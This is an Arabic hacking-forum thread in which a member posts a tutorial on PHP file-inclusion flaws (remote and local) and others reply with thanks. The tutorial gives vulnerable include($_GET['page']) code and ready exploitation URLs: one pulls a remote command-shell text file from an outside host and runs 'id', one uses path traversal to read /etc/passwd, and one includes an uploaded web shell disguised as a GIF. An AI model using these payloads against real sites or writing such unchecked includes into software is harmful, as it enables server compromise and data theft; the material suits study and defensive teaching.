1. 0ne-Tw0

    0ne-Tw0 Developer

    الأنتساب:
    ‏14 يناير 2013
    المشاركات:
    34
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    [​IMG]

    السلام عليكم ورحمة الله وبركاته

    اللهم لا علم لنا الا ماعلمتنا , اللهم علمنا ماينفعنا وانفعنا بما علمتنا انك انت العليم الحكيم.

    بسم الله الرحمن الرحيم

    اليوم درسنا راح يتكلم
    ثغرات الفايل انكلود

    ما هي ثغرات الفايل انكلود - File Include

    هذه الثغرات عبارة عن تطبيق اكواد عبر ادخال ملفات باستخدام دوال معينة تكون مستخدمة بالسكربت لتطبيق اوامر اخرى ..

    الدوال التي يمكن استغلالها لتطبيق الفايل انكلود

    كود PHP:
    include
    require
    include_once
    require_once
    ما هو عمل هذه الدوال

    هذه الدوال تقوم بتطبيق محتوي ملف معين كملف برمجي ..
    اي ادخال الاكواد من ملفات خارجية .. ولا يخلى اي سكريبت من احد هذه الدوال
    ولكن تكون الثغرة في استخدام المتغيرات داخل هذه الدوال وامكانية التعديل على المتغير

    انواع ثغرات ال File include

    هذا النوع ينقسم الى قسمين :

    1 - Remote File Include :
    وهو عملية تطبيق كود من ملف اي ملف وليس بالشرط ان يكون على نفس السيرفر .. اي يمكن تطبيق اكواد اي ملف اخر .. دون اي مشاكل

    2 - Local File include :
    وهي امكانية تطبيق كود اي ملف اخر من على نفس السيرفر
    كيف يتم اكتشاف ثغرات الفايل انكلود ؟
    طبعا لكي تكتشف ثغرات الفايل انكلود يجب عليك البحث بالشفرة المصدرية او الكود للسكربتات ..
    وهذا الكود مثال على ثغرات الفايل انكلود

    كود PHP:
    <?php
    $page 
    $_GET['page'];
    include (
    $page);
    ?>
    وفي هذه الحالة يتم تطبيق الثغرة بكل سهولة على الملف باستخدام المتغير page
    ففي هذه الحالة يكون الاستغلال مثلا

    كود PHP:
    file.php?page=shell.txt
    او اي ملف اخر مثلا

    كود PHP:
    file.php?page=http://members.lycos.co.uk/soqor10/cmd.txt&cmd=id
    اما لو كان الكود مثلا :

    كود PHP:
    <?php
    $page 
    $_GET['page'];
    include (
    "./pages/$page");
    ?>
    فهنا يمكن فقط ادخال ملفات داخلية اي على نفس السيرفر
    وطبعا يمكن استخدام النقاط بشكل طبيعي لتخطي المجلدات
    مثلا لو كان مسار الملف

    كود PHP:
    /home/user/public_html/file.php
    يكون الاستغلال للوصول لل /etc/passwd

    كود PHP:
    file.php?page=../../../../etc/passwd
    او مثلا لو قمت برفع ملف شل بامتداد gif على مركز رفع على نفس السيرفر
    واكن مسار الملف

    كود PHP:
    /home/upload/public_html/uploads/file01c144dd.gif
    تدخله بالطريقة التالية :

    كود PHP:
    file.php?page=../../../../home/upload/public_html/uploads/file01c144dd.gif
    وطبعا هذا النوع من الثغرات يعتمد بشكل رئيسي على القدرة على قراءة الاكواد والصبر .!!:{

    الى هنا ينتهي درسنا اتمنى ان تكونو قد استفدتم من الدرس
     
  2. AL.MaX

    AL.MaX Developer

    الأنتساب:
    ‏22 مايو 2012
    المشاركات:
    52
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    HaCkEr
    الإقامة:
    518/.
    رد: درس ما هي ثغرات الفايل انكلود - File Include

    السلام عليكم ورحمه الله وبركاته

    يعطيك ألف عافيه اخي درس رائع وسلس i:q^:
     
  3. MR ! HЄRO

    MR ! HЄRO Developer

    الأنتساب:
    ‏18 يوليو 2012
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: درس ما هي ثغرات الفايل انكلود - File Include

    مبدع ومشكور على الطرح الرائع
     
  4. عُبْدُالـڔבـَمَڼ

    عُبْدُالـڔבـَمَڼ Developer

    الأنتساب:
    ‏29 مارس 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    |[ HacKeR - Security - Hacking Software ]|
    الإقامة:
    |[ Saudi Arabia ]|
    رد: درس ما هي ثغرات الفايل انكلود - File Include

    الله يعطيك الف عافيه :{1}:​
     
  5. 0ne-Tw0

    0ne-Tw0 Developer

    الأنتساب:
    ‏14 يناير 2013
    المشاركات:
    34
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: درس ما هي ثغرات الفايل انكلود - File Include

    حياكم الله اخواني &:":
     

مشاركة هذه الصفحة